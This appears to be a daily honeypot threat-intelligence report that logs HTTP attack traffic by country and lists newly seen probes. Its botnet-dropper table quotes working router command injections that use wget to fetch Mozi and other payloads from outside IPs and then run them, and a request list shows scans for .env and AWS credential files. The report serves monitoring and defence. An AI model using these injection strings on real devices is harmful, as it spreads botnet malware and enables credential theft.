Daily Report: 2025-05-03#
Executive summary#
interaction report on http service of various Hhoneypot around the world.
- Executive summary
- OT report simplified
- Botnet dropper behaviour
- List of request
- List of country_iso_code
executive_summary#
In today’s repport, we detected 5 stage 1 IP address(es), linked to 5 dropper URL(s).
There are 27 new requests that have never been observed before (these were added to the monitored request database.).
A total of 1388 requests were recorded during the day, originating from 5 different countries, with a peak of 274 requests coming from NL.
ot_simplified_report#
simplified report for medium-level interactions with honeypots that mimic industrial systems (web site loading, or interactions with the website), for more contact us on social@shoggoth.industries.
source_country | targeted_country |
---|---|
US | Dubai |
US | Israel |
botnet_dropper_behaviour#
remote_addr | request |
---|---|
79.116.34.227 | GET /shell?cd+/tmp;rm+-rf+*;wget+176.65.148.180/jaws;sh+/tmp/jaws HTTP/1.1 |
122.97.214.128 | GET /shell?cd+/tmp;rm+-rf+*;wget+http://102.97.172.58:47010/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1 |
122.97.137.166 | GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://102.97.194.141:32859/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/¤tsetting.htm=1 HTTP/1.0 |
45.95.147.209 | GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60cd+%2Ftmp%3B+rm+-rf+sh%3B+wget+http%3A%2F%2F176.65.148.234%2Fsh%3B+chmod+777+sh%3B+.%2Fsh+tplink%3B+rm+-rf+sh%60) HTTP/1.1 |
185.218.84.39 | GET /shell?killall+-9+arm7;killall+-9+arm4;killall+-9+arm;killall+-9+/bin/sh;killall+-9+/bin/sh;killall+-9+/z/bin;killall+-9+/bin/bash;cd+/tmp;rm+drea4+arm7;wget+http:/\x5C/176.65.144.76/efefa7;chmod+777+efefa7;./efefa7+jaws;wget+http:/\x5C/176.65.144.76/drea4;chmod+777+drea4;./drea4+jaws HTTP/1.1 |
request#
The list of requests presented here are those that have not yet been yet integrated into the request database.
number_of_occurence | request | |
---|---|---|
68 | 4 | GET /developmentserver/metadatauploader HTTP/1.1 |
194 | 1 | GET /system.ini?loginuse=LOGIN&?loginpas=PASS HTTP/1.1 |
207 | 1 | GET /cron/aws_ses.env HTTP/1.1 |
214 | 1 | GET /secrets/aws_ses.env HTTP/1.1 |
221 | 1 | GET /cli/aws_ses.env HTTP/1.1 |
230 | 1 | GET /aws-sns/.env HTTP/1.1 |
231 | 1 | GET /var/lib/aws/sns.env HTTP/1.1 |
232 | 1 | GET /var/aws/ses.env HTTP/1.1 |
244 | 1 | GET /aws-ses/.env HTTP/1.1 |
246 | 1 | GET /cli/aws_sns.env HTTP/1.1 |
247 | 1 | GET /.sendgrind.env HTTP/1.1 |
248 | 1 | GET /var/lib/aws/ses.env HTTP/1.1 |
259 | 1 | GET /src/tests/fixtures/typeScriptVisualizeProject/.env HTTP/1.1 |
262 | 1 | GET /secret/aws_ses.env HTTP/1.1 |
267 | 1 | GET /storage/aws_ses.env HTTP/1.1 |
271 | 1 | GET /opt/aws/ses.env HTTP/1.1 |
276 | 1 | GET /var/www/aws-sns.env HTTP/1.1 |
281 | 1 | GET /data/aws/ses.env HTTP/1.1 |
282 | 1 | GET /src/tests/fixtures/typeScriptProject/.env HTTP/1.1 |
309 | 1 | GET /var/aws/sns.env HTTP/1.1 |
310 | 1 | GET /storage/aws_sns.env HTTP/1.1 |
314 | 1 | GET /secret/aws_sns.env HTTP/1.1 |
319 | 1 | GET /opt/aws/sns.env HTTP/1.1 |
323 | 1 | GET /src/tests/fixtures/instanceWithDependentSteps/.env HTTP/1.1 |
330 | 1 | GET /secrets/aws_sns.env HTTP/1.1 |
344 | 1 | GET /cron/aws_sns.env HTTP/1.1 |
350 | 1 | GET /data/aws/sns.env HTTP/1.1 |
country_iso_code#
number_of_occurence | country_iso_code | |
---|---|---|
0 | 274 | NL |
1 | 239 | US |
2 | 219 | GB |
3 | 166 | BG |
4 | 70 | SC |
5 | 62 | CH |
6 | 56 | CN |
7 | 47 | VN |
8 | 39 | PL |
9 | 32 | HK |
10 | 29 | DE |
11 | 28 | IN |
12 | 16 | KR |
13 | 12 | CA |
14 | 11 | AZ |
15 | 10 | SG |
16 | 10 | UA |
17 | 8 | CZ |
18 | 7 | UZ |
19 | 6 | HR |
20 | 4 | GH |
21 | 4 | AO |
22 | 4 | EE |
23 | 4 | JP |
24 | 3 | BE |
25 | 3 | PT |
26 | 3 | FR |
27 | 2 | DO |
28 | 2 | PE |
29 | 2 | KW |
30 | 2 | TR |
31 | 2 | ES |
32 | 2 | IT |
33 | 1 | LT |
34 | 1 | HU |
35 | 1 | AU |
36 | 1 | DK |
37 | 1 | ID |
38 | 1 | MC |
39 | 1 | BR |
40 | 1 | RU |
41 | 1 | AR |
42 | 1 | SE |